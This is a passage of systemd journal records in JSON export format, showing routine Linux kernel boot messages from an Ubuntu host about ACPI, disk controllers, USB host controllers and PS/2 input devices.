"__REALTIME_TIMESTAMP" : "1615280779962374", "__MONOTONIC_TIMESTAMP" : "5679262", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "867345", "MESSAGE" : "ACPI: Power Button [PWRF]" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=15a;b=e2b08827b5804427b422c10c84f1567e;m=56a8a9;t=5bd16dd1a2810;x=b5d2cab658903538", "__REALTIME_TIMESTAMP" : "1615280779962384", "__MONOTONIC_TIMESTAMP" : "5679273", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "4", "_SOURCE_MONOTONIC_TIMESTAMP" : "895765", "MESSAGE" : "ACPI: PCI Interrupt Link [LNKC] enabled at IRQ 10" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=15b;b=e2b08827b5804427b422c10c84f1567e;m=56a8b3;t=5bd16dd1a281b;x=975e38e9f7891a99", "__REALTIME_TIMESTAMP" : "1615280779962395", "__MONOTONIC_TIMESTAMP" : "5679283", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "4", "_SOURCE_MONOTONIC_TIMESTAMP" : "953887", "MESSAGE" : "ACPI: PCI Interrupt Link [LNKA] enabled at IRQ 10" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=15c;b=e2b08827b5804427b422c10c84f1567e;m=56a8be;t=5bd16dd1a2825;x=76d0dfb4403d0404", "__REALTIME_TIMESTAMP" : "1615280779962405", "__MONOTONIC_TIMESTAMP" : "5679294", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "959258", "MESSAGE" : "Serial: 8250/16550 driver, 32 ports, IRQ sharing enabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=15d;b=e2b08827b5804427b422c10c84f1567e;m=56a8c8;t=5bd16dd1a2830;x=e3dc566651669442", "__REALTIME_TIMESTAMP" : "1615280779962416", "__MONOTONIC_TIMESTAMP" : "5679304", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : 
"kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "990516", "MESSAGE" : "00:04: ttyS0 at I/O 0x3f8 (irq = 4, base_baud = 115200) is a 16550A" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=15e;b=e2b08827b5804427b422c10c84f1567e;m=56a8d3;t=5bd16dd1a283a;x=bafe6839371d59b1", "__REALTIME_TIMESTAMP" : "1615280779962426", "__MONOTONIC_TIMESTAMP" : "5679315", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "995867", "MESSAGE" : "Linux agpgart interface v0.103" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=15f;b=e2b08827b5804427b422c10c84f1567e;m=56a8e1;t=5bd16dd1a2848;x=e1e7dbc7437c01cd", "__REALTIME_TIMESTAMP" : "1615280779962440", "__MONOTONIC_TIMESTAMP" : "5679329", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "999305", "MESSAGE" : "loop: module loaded" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=160;b=e2b08827b5804427b422c10c84f1567e;m=56a981;t=5bd16dd1a28e8;x=5ea5d18ed95c93f8", "__REALTIME_TIMESTAMP" : "1615280779962600", "__MONOTONIC_TIMESTAMP" : "5679489", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.1", "_UDEV_SYSNAME" : "0000:00:01.1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1001245", "MESSAGE" : "ata_piix 0000:00:01.1: version 2.13" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=161;b=e2b08827b5804427b422c10c84f1567e;m=56aa3a;t=5bd16dd1a29a2;x=75e5a5ceaf738cb5", "__REALTIME_TIMESTAMP" : "1615280779962786", "__MONOTONIC_TIMESTAMP" : "5679674", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "scsi", "_KERNEL_DEVICE" : "+scsi:host0", "_UDEV_SYSNAME" : "host0", "_SOURCE_MONOTONIC_TIMESTAMP" : "1002292", "MESSAGE" : "scsi host0: ata_piix" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=162;b=e2b08827b5804427b422c10c84f1567e;m=56aaca;t=5bd16dd1a2a31;x=8576405b03731e66", "__REALTIME_TIMESTAMP" : "1615280779962929", "__MONOTONIC_TIMESTAMP" : "5679818", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "scsi", "_KERNEL_DEVICE" : "+scsi:host1", "_UDEV_SYSNAME" : "host1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1004238", "MESSAGE" : "scsi host1: ata_piix" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=163;b=e2b08827b5804427b422c10c84f1567e;m=56aad9;t=5bd16dd1a2a41;x=138bf646975bf51", "__REALTIME_TIMESTAMP" : "1615280779962945", "__MONOTONIC_TIMESTAMP" : "5679833", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1006029", "MESSAGE" : "ata1: PATA max MWDMA2 cmd 0x1f0 ctl 0x3f6 bmdma 0xc0c0 irq 14" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=164;b=e2b08827b5804427b422c10c84f1567e;m=56aae4;t=5bd16dd1a2a4b;x=2194139371723e17", "__REALTIME_TIMESTAMP" : "1615280779962955", "__MONOTONIC_TIMESTAMP" : 
"5679844", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1009318", "MESSAGE" : "ata2: PATA max MWDMA2 cmd 0x170 ctl 0x376 bmdma 0xc0c8 irq 15" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=165;b=e2b08827b5804427b422c10c84f1567e;m=56aafe;t=5bd16dd1a2a65;x=4dc37be8fab0aeaf", "__REALTIME_TIMESTAMP" : "1615280779962981", "__MONOTONIC_TIMESTAMP" : "5679870", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1013436", "MESSAGE" : "libphy: Fixed MDIO Bus: probed" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=166;b=e2b08827b5804427b422c10c84f1567e;m=56ab19;t=5bd16dd1a2a80;x=2cf67f06d0b6d664", "__REALTIME_TIMESTAMP" : "1615280779963008", "__MONOTONIC_TIMESTAMP" : "5679897", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1015489", "MESSAGE" : "tun: Universal TUN/TAP device driver, 1.6" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=167;b=e2b08827b5804427b422c10c84f1567e;m=56ab23;t=5bd16dd1a2a8b;x=378816d957ac1cbf", "__REALTIME_TIMESTAMP" : "1615280779963019", "__MONOTONIC_TIMESTAMP" : "5679907", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1018110", "MESSAGE" : "PPP generic driver version 2.4.2" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=168;b=e2b08827b5804427b422c10c84f1567e;m=56ab2e;t=5bd16dd1a2a95;x=18e4f82f2fb204f5", "__REALTIME_TIMESTAMP" : "1615280779963029", "__MONOTONIC_TIMESTAMP" : "5679918", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1020262", "MESSAGE" : "ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=169;b=e2b08827b5804427b422c10c84f1567e;m=56ab38;t=5bd16dd1a2aa0;x=3e3190bec7f42fb6", "__REALTIME_TIMESTAMP" : "1615280779963040", "__MONOTONIC_TIMESTAMP" : "5679928", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1023545", "MESSAGE" : "ehci-pci: EHCI PCI platform driver" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=16a;b=e2b08827b5804427b422c10c84f1567e;m=56ab43;t=5bd16dd1a2aaa;x=1ef9ebda111f1d22", "__REALTIME_TIMESTAMP" : "1615280779963050", "__MONOTONIC_TIMESTAMP" : "5679939", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1025829", "MESSAGE" : "ehci-platform: EHCI generic platform driver" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=16b;b=e2b08827b5804427b422c10c84f1567e;m=56ab51;t=5bd16dd1a2ab8;x=3dfe6dbf3b16578f", "__REALTIME_TIMESTAMP" : "1615280779963064", "__MONOTONIC_TIMESTAMP" : "5679953", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" 
: "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1028441", "MESSAGE" : "ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=16c;b=e2b08827b5804427b422c10c84f1567e;m=56ab5b;t=5bd16dd1a2ac3;x=5c45b4e56c4e32d3", "__REALTIME_TIMESTAMP" : "1615280779963075", "__MONOTONIC_TIMESTAMP" : "5679963", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1031526", "MESSAGE" : "ohci-pci: OHCI PCI platform driver" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=16d;b=e2b08827b5804427b422c10c84f1567e;m=56ab66;t=5bd16dd1a2acd;x=c6af84ea0edcf2a4", "__REALTIME_TIMESTAMP" : "1615280779963085", "__MONOTONIC_TIMESTAMP" : "5679974", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1033861", "MESSAGE" : "ohci-platform: OHCI generic platform driver" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=16e;b=e2b08827b5804427b422c10c84f1567e;m=56ab71;t=5bd16dd1a2ad8;x=27122ae32a945e34", "__REALTIME_TIMESTAMP" : "1615280779963096", "__MONOTONIC_TIMESTAMP" : "5679985", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1036472", "MESSAGE" : "uhci_hcd: USB Universal Host Controller Interface driver" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=16f;b=e2b08827b5804427b422c10c84f1567e;m=56ac12;t=5bd16dd1a2b79;x=6e5c6dcfc49b8307", 
"__REALTIME_TIMESTAMP" : "1615280779963257", "__MONOTONIC_TIMESTAMP" : "5680146", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.2", "_UDEV_SYSNAME" : "0000:00:01.2", "_SOURCE_MONOTONIC_TIMESTAMP" : "1065982", "MESSAGE" : "uhci_hcd 0000:00:01.2: UHCI Host Controller" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=170;b=e2b08827b5804427b422c10c84f1567e;m=56aca9;t=5bd16dd1a2c11;x=6cc042b6b48f343f", "__REALTIME_TIMESTAMP" : "1615280779963409", "__MONOTONIC_TIMESTAMP" : "5680297", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.2", "_UDEV_SYSNAME" : "0000:00:01.2", "_SOURCE_MONOTONIC_TIMESTAMP" : "1068810", "MESSAGE" : "uhci_hcd 0000:00:01.2: new USB bus registered, assigned bus number 1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=171;b=e2b08827b5804427b422c10c84f1567e;m=56ad2b;t=5bd16dd1a2c93;x=4773aee5aabdab80", "__REALTIME_TIMESTAMP" : "1615280779963539", "__MONOTONIC_TIMESTAMP" : "5680427", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.2", "_UDEV_SYSNAME" : "0000:00:01.2", "_SOURCE_MONOTONIC_TIMESTAMP" : "1072774", "MESSAGE" : "uhci_hcd 0000:00:01.2: detected 2 ports" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=172;b=e2b08827b5804427b422c10c84f1567e;m=56d595;t=5bd16dd1a54fc;x=251c545145a04c84", "__REALTIME_TIMESTAMP" : 
"1615280779973884", "__MONOTONIC_TIMESTAMP" : "5690773", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.2", "_UDEV_SYSNAME" : "0000:00:01.2", "_SOURCE_MONOTONIC_TIMESTAMP" : "1075535", "MESSAGE" : "uhci_hcd 0000:00:01.2: irq 11, io base 0x0000c080" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=173;b=e2b08827b5804427b422c10c84f1567e;m=56d6aa;t=5bd16dd1a5612;x=9be4e9f717037fc4", "__REALTIME_TIMESTAMP" : "1615280779974162", "__MONOTONIC_TIMESTAMP" : "5691050", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_KERNEL_DEVICE" : "c189:0", "_UDEV_DEVNODE" : "/dev/bus/usb/001/001", "_UDEV_SYSNAME" : "usb1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1078685", "MESSAGE" : "usb usb1: New USB device found, idVendor=1d6b, idProduct=0001" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=174;b=e2b08827b5804427b422c10c84f1567e;m=56d753;t=5bd16dd1a56ba;x=edb68a51b32d1f48", "__REALTIME_TIMESTAMP" : "1615280779974330", "__MONOTONIC_TIMESTAMP" : "5691219", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_KERNEL_DEVICE" : "c189:0", "_UDEV_DEVNODE" : "/dev/bus/usb/001/001", "_UDEV_SYSNAME" : "usb1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1082159", "MESSAGE" : "usb usb1: New USB device strings: Mfr=3, Product=2, SerialNumber=1" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=175;b=e2b08827b5804427b422c10c84f1567e;m=56d7f3;t=5bd16dd1a575a;x=4551231a8f22525c", "__REALTIME_TIMESTAMP" : "1615280779974490", "__MONOTONIC_TIMESTAMP" : "5691379", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_KERNEL_DEVICE" : "c189:0", "_UDEV_DEVNODE" : "/dev/bus/usb/001/001", "_UDEV_SYSNAME" : "usb1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1085960", "MESSAGE" : "usb usb1: Product: UHCI Host Controller" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=176;b=e2b08827b5804427b422c10c84f1567e;m=571306;t=5bd16dd1a926d;x=87ece26f0c49ecc4", "__REALTIME_TIMESTAMP" : "1615280779989613", "__MONOTONIC_TIMESTAMP" : "5706502", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_KERNEL_DEVICE" : "c189:0", "_UDEV_DEVNODE" : "/dev/bus/usb/001/001", "_UDEV_SYSNAME" : "usb1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1088517", "MESSAGE" : "usb usb1: Manufacturer: Linux 4.15.0-60-generic uhci_hcd" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=177;b=e2b08827b5804427b422c10c84f1567e;m=571413;t=5bd16dd1a937b;x=322d5212720146ca", "__REALTIME_TIMESTAMP" : "1615280779989883", "__MONOTONIC_TIMESTAMP" : "5706771", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_KERNEL_DEVICE" : "c189:0", "_UDEV_DEVNODE" : "/dev/bus/usb/001/001", "_UDEV_SYSNAME" : "usb1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1091807", "MESSAGE" : "usb usb1: SerialNumber: 
0000:00:01.2" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=178;b=e2b08827b5804427b422c10c84f1567e;m=572760;t=5bd16dd1aa6c7;x=e9bd32cc57333af6", "__REALTIME_TIMESTAMP" : "1615280779994823", "__MONOTONIC_TIMESTAMP" : "5711712", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_KERNEL_DEVICE" : "+usb:1-0:1.0", "_UDEV_SYSNAME" : "1-0:1.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "1094287", "MESSAGE" : "hub 1-0:1.0: USB hub found" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=179;b=e2b08827b5804427b422c10c84f1567e;m=572807;t=5bd16dd1aa76e;x=1424ea86ec6e89e1", "__REALTIME_TIMESTAMP" : "1615280779994990", "__MONOTONIC_TIMESTAMP" : "5711879", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_KERNEL_DEVICE" : "+usb:1-0:1.0", "_UDEV_SYSNAME" : "1-0:1.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "1096296", "MESSAGE" : "hub 1-0:1.0: 2 ports detected" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=17a;b=e2b08827b5804427b422c10c84f1567e;m=572818;t=5bd16dd1aa77f;x=487a777dc803ce69", "__REALTIME_TIMESTAMP" : "1615280779995007", "__MONOTONIC_TIMESTAMP" : "5711896", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1098684", "MESSAGE" : "i8042: PNP: PS/2 Controller [PNP0303:KBD,PNP0f13:MOU] at 0x60,0x64 irq 1,12" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=17b;b=e2b08827b5804427b422c10c84f1567e;m=572824;t=5bd16dd1aa78b;x=c885aa5c0b1f5851", 
"__REALTIME_TIMESTAMP" : "1615280779995019", "__MONOTONIC_TIMESTAMP" : "5711908", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1103996", "MESSAGE" : "serio: i8042 KBD port at 0x60,0x64 irq 1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=17c;b=e2b08827b5804427b422c10c84f1567e;m=57282f;t=5bd16dd1aa796;x=1ac2ff77ced2737", "__REALTIME_TIMESTAMP" : "1615280779995030", "__MONOTONIC_TIMESTAMP" : "5711919", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1106696", "MESSAGE" : "serio: i8042 AUX port at 0x60,0x64 irq 12" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=17d;b=e2b08827b5804427b422c10c84f1567e;m=572839;t=5bd16dd1aa7a1;x=1843acc11db0ccff", "__REALTIME_TIMESTAMP" : "1615280779995041", "__MONOTONIC_TIMESTAMP" : "5711929", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1109449", "MESSAGE" : "mousedev: PS/2 mouse device common for all mice" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=17e;b=e2b08827b5804427b422c10c84f1567e;m=572844;t=5bd16dd1aa7ac;x=50d9fe56fe48eab5", "__REALTIME_TIMESTAMP" : "1615280779995052", "__MONOTONIC_TIMESTAMP" : "5711940", "_BOOT_ID" : 